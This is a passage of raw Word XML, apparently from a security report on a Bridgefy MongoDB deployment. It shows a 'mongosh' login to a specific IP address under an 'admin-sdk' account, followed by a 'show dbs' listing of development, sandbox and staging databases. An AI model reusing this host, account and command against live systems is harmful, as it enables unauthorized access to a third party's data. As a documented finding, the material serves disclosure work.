        <w:t>MongoDB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>databases):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mongosh -u </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-sdk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"mongodb://3.131.221.30"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>show </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>dbs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="66"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="0" w:right="5435" w:firstLine="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="0" simplePos="0" relativeHeight="15748608">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1333500</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>24136</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1584960" cy="902335"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="59" name="Textbox 59"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="59" name="Textbox 59"/>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1584960" cy="902335"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:tbl>
                            <w:tblPr>
                              <w:tblW w:w="0" w:type="auto"/>
                              <w:jc w:val="left"/>
                              <w:tblInd w:w="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0"/>
                              <w:gridCol w:w="1460"/>
                              <w:gridCol w:w="396"/>
                            </w:tblGrid>
                            <w:tr>
                              <w:trPr>
                                <w:trHeight w:val="204" w:hRule="atLeast"/>
                              </w:trPr>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="520" w:type="dxa"/>
                                  <w:tcBorders>
                                    <w:bottom w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                                  </w:tcBorders>
                                  <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:pStyle w:val="TableParagraph"/>
                                    <w:spacing w:line="184" w:lineRule="exact"/>
                                    <w:ind w:left="0" w:right="23"/>
                                    <w:jc w:val="center"/>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:color w:val="333333"/>
                                      <w:spacing w:val="-2"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>admin</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="1856" w:type="dxa"/>
                                  <w:gridSpan w:val="2"/>
                                  <w:tcBorders>
                                    <w:bottom w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                                  </w:tcBorders>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:pStyle w:val="TableParagraph"/>
                                    <w:ind w:left="0"/>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Times New Roman"/>
                                      <w:sz w:val="14"/>
                                    </w:rPr>
                                  </w:pPr>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr>
                              <w:trPr>
                                <w:trHeight w:val="197" w:hRule="atLeast"/>
                              </w:trPr>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="2376" w:type="dxa"/>
                                  <w:gridSpan w:val="3"/>
                                  <w:tcBorders>
                                    <w:top w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                                    <w:bottom w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                                  </w:tcBorders>
                                  <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:pStyle w:val="TableParagraph"/>
                                    <w:spacing w:line="177" w:lineRule="exact"/>
                                    <w:ind w:left="0"/>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:color w:val="333333"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>bridgefy-app-</w:t>
                                  </w:r>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:color w:val="333333"/>
                                      <w:spacing w:val="-2"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>development</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr>
                              <w:trPr>
                                <w:trHeight w:val="197" w:hRule="atLeast"/>
                              </w:trPr>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="1980" w:type="dxa"/>
                                  <w:gridSpan w:val="2"/>
                                  <w:tcBorders>
                                    <w:top w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                                    <w:bottom w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                                  </w:tcBorders>
                                  <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:pStyle w:val="TableParagraph"/>
                                    <w:spacing w:line="177" w:lineRule="exact"/>
                                    <w:ind w:left="0"/>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:color w:val="333333"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>bridgefy-app-</w:t>
                                  </w:r>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:color w:val="333333"/>
                                      <w:spacing w:val="-2"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>sandbox</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="396" w:type="dxa"/>
                                  <w:vMerge w:val="restart"/>
                                  <w:tcBorders>
                                    <w:top w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                                  </w:tcBorders>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:pStyle w:val="TableParagraph"/>
                                    <w:ind w:left="0"/>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Times New Roman"/>
                                      <w:sz w:val="20"/>
                                    </w:rPr>
                                  </w:pPr>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr>
                              <w:trPr>
                                <w:trHeight w:val="197" w:hRule="atLeast"/>
                              </w:trPr>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="1980" w:type="dxa"/>
                                  <w:gridSpan w:val="2"/>
                                  <w:tcBorders>
                                    <w:top w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                                    <w:bottom w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                                  </w:tcBorders>
                                  <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:pStyle w:val="TableParagraph"/>
                                    <w:spacing w:line="177" w:lineRule="exact"/>
                                    <w:ind w:left="0"/>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:color w:val="333333"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>bridgefy-app-</w:t>
                                  </w:r>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:color w:val="333333"/>
                                      <w:spacing w:val="-2"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>staging</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="396" w:type="dxa"/>
                                  <w:vMerge/>
                                  <w:tcBorders>
                                    <w:top w:val="nil"/>
                                  </w:tcBorders>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:rPr>
                                      <w:sz w:val="2"/>
                                      <w:szCs w:val="2"/>
                                    </w:rPr>
                                  </w:pPr>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr>
                              <w:trPr>
                                <w:trHeight w:val="197" w:hRule="atLeast"/>
                              </w:trPr>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="520" w:type="dxa"/>
                                  <w:tcBorders>
                                    <w:top w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                                    <w:bottom w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                                  </w:tcBorders>
                                  <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:pStyle w:val="TableParagraph"/>
                                    <w:spacing w:line="177" w:lineRule="exact"/>
                                    <w:ind w:left="0" w:right="-87"/>
                                    <w:jc w:val="center"/>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:color w:val="333333"/>
                                      <w:spacing w:val="-2"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>config</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="1460" w:type="dxa"/>
                                  <w:vMerge w:val="restart"/>
                                  <w:tcBorders>
                                    <w:top w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                                  </w:tcBorders>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:pStyle w:val="TableParagraph"/>
                                    <w:ind w:left="0"/>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Times New Roman"/>
                                      <w:sz w:val="20"/>
                                    </w:rPr>
                                  </w:pPr>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="396" w:type="dxa"/>
                                  <w:vMerge/>
                                  <w:tcBorders>
                                    <w:top w:val="nil"/>
                                  </w:tcBorders>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:rPr>
                                      <w:sz w:val="2"/>
                                      <w:szCs w:val="2"/>
                                    </w:rPr>
                                  </w:pPr>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr>
                              <w:trPr>
                                <w:trHeight w:val="204" w:hRule="atLeast"/>
                              </w:trPr>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="520" w:type="dxa"/>
                                  <w:tcBorders>
                                    <w:top w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                                  </w:tcBorders>
                                  <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:pStyle w:val="TableParagraph"/>
                                    <w:spacing w:line="184" w:lineRule="exact"/>
                                    <w:ind w:left="0" w:right="23"/>
                                    <w:jc w:val="center"/>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:color w:val="333333"/>
                                      <w:spacing w:val="-2"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>local</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="1460" w:type="dxa"/>
                                  <w:vMerge/>
                                  <w:tcBorders>
                                    <w:top w:val="nil"/>
                                  </w:tcBorders>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:rPr>
                                      <w:sz w:val="2"/>
                                      <w:szCs w:val="2"/>
                                    </w:rPr>
                                  </w:pPr>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="396" w:type="dxa"/>
                                  <w:vMerge/>
                                  <w:tcBorders>
                                    <w:top w:val="nil"/>
                                  </w:tcBorders>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:rPr>
                                      <w:sz w:val="2"/>
                                      <w:szCs w:val="2"/>
                                    </w:rPr>
                                  </w:pPr>
                                </w:p>
                              </w:tc>
                            </w:tr>
                          </w:tbl>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="BodyText"/>
                            </w:pPr>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape style="position:absolute;margin-left:105pt;margin-top:1.900519pt;width:124.8pt;height:71.05pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:15748608" type="#_x0000_t202" id="docshape46" filled="false" stroked="false">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:tbl>
                      <w:tblPr>
                        <w:tblW w:w="0" w:type="auto"/>
                        <w:jc w:val="left"/>
                        <w:tblInd w:w="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0"/>
                        <w:gridCol w:w="1460"/>
                        <w:gridCol w:w="396"/>
                      </w:tblGrid>
                      <w:tr>
                        <w:trPr>
                          <w:trHeight w:val="204" w:hRule="atLeast"/>
                        </w:trPr>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="520" w:type="dxa"/>
                            <w:tcBorders>
                              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                            </w:tcBorders>
                            <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="TableParagraph"/>
                              <w:spacing w:line="184" w:lineRule="exact"/>
                              <w:ind w:left="0" w:right="23"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="333333"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>admin</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="1856" w:type="dxa"/>
                            <w:gridSpan w:val="2"/>
                            <w:tcBorders>
                              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                            </w:tcBorders>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="TableParagraph"/>
                              <w:ind w:left="0"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Times New Roman"/>
                                <w:sz w:val="14"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr>
                        <w:trPr>
                          <w:trHeight w:val="197" w:hRule="atLeast"/>
                        </w:trPr>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="2376" w:type="dxa"/>
                            <w:gridSpan w:val="3"/>
                            <w:tcBorders>
                              <w:top w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                            </w:tcBorders>
                            <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="TableParagraph"/>
                              <w:spacing w:line="177" w:lineRule="exact"/>
                              <w:ind w:left="0"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="333333"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>bridgefy-app-</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="333333"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>development</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr>
                        <w:trPr>
                          <w:trHeight w:val="197" w:hRule="atLeast"/>
                        </w:trPr>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="1980" w:type="dxa"/>
                            <w:gridSpan w:val="2"/>
                            <w:tcBorders>
                              <w:top w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                            </w:tcBorders>
                            <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="TableParagraph"/>
                              <w:spacing w:line="177" w:lineRule="exact"/>
                              <w:ind w:left="0"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="333333"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>bridgefy-app-</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="333333"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>sandbox</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="396" w:type="dxa"/>
                            <w:vMerge w:val="restart"/>
                            <w:tcBorders>
                              <w:top w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                            </w:tcBorders>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="TableParagraph"/>
                              <w:ind w:left="0"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Times New Roman"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr>
                        <w:trPr>
                          <w:trHeight w:val="197" w:hRule="atLeast"/>
                        </w:trPr>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="1980" w:type="dxa"/>
                            <w:gridSpan w:val="2"/>
                            <w:tcBorders>
                              <w:top w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                            </w:tcBorders>
                            <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="TableParagraph"/>
                              <w:spacing w:line="177" w:lineRule="exact"/>
                              <w:ind w:left="0"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="333333"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>bridgefy-app-</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="333333"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>staging</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="396" w:type="dxa"/>
                            <w:vMerge/>
                            <w:tcBorders>
                              <w:top w:val="nil"/>
                            </w:tcBorders>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:rPr>
                                <w:sz w:val="2"/>
                                <w:szCs w:val="2"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr>
                        <w:trPr>
                          <w:trHeight w:val="197" w:hRule="atLeast"/>
                        </w:trPr>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="520" w:type="dxa"/>
                            <w:tcBorders>
                              <w:top w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                            </w:tcBorders>
                            <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="TableParagraph"/>
                              <w:spacing w:line="177" w:lineRule="exact"/>
                              <w:ind w:left="0" w:right="-87"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="333333"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>config</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="1460" w:type="dxa"/>
                            <w:vMerge w:val="restart"/>
                            <w:tcBorders>
                              <w:top w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                            </w:tcBorders>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="TableParagraph"/>
                              <w:ind w:left="0"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Times New Roman"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="396" w:type="dxa"/>
                            <w:vMerge/>
                            <w:tcBorders>
                              <w:top w:val="nil"/>
                            </w:tcBorders>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:rPr>
                                <w:sz w:val="2"/>
                                <w:szCs w:val="2"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr>
                        <w:trPr>
                          <w:trHeight w:val="204" w:hRule="atLeast"/>
                        </w:trPr>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="520" w:type="dxa"/>
                            <w:tcBorders>
                              <w:top w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                            </w:tcBorders>
                            <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="TableParagraph"/>
                              <w:spacing w:line="184" w:lineRule="exact"/>
                              <w:ind w:left="0" w:right="23"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="333333"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>local</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="1460" w:type="dxa"/>
                            <w:vMerge/>
                            <w:tcBorders>
                              <w:top w:val="nil"/>
                            </w:tcBorders>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:rPr>
                                <w:sz w:val="2"/>
                                <w:szCs w:val="2"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="396" w:type="dxa"/>
                            <w:vMerge/>
                            <w:tcBorders>
                              <w:top w:val="nil"/>
                            </w:tcBorders>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:rPr>
                                <w:sz w:val="2"/>
                                <w:szCs w:val="2"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                        </w:tc>
                      </w:tr>
                    </w:tbl>
                    <w:p>
                      <w:pPr>
                        <w:pStyle w:val="BodyText"/>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="none"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>100.00 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>KiB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="0" w:right="5435" w:firstLine="0"/>
        <w:jc w:val="right"/>
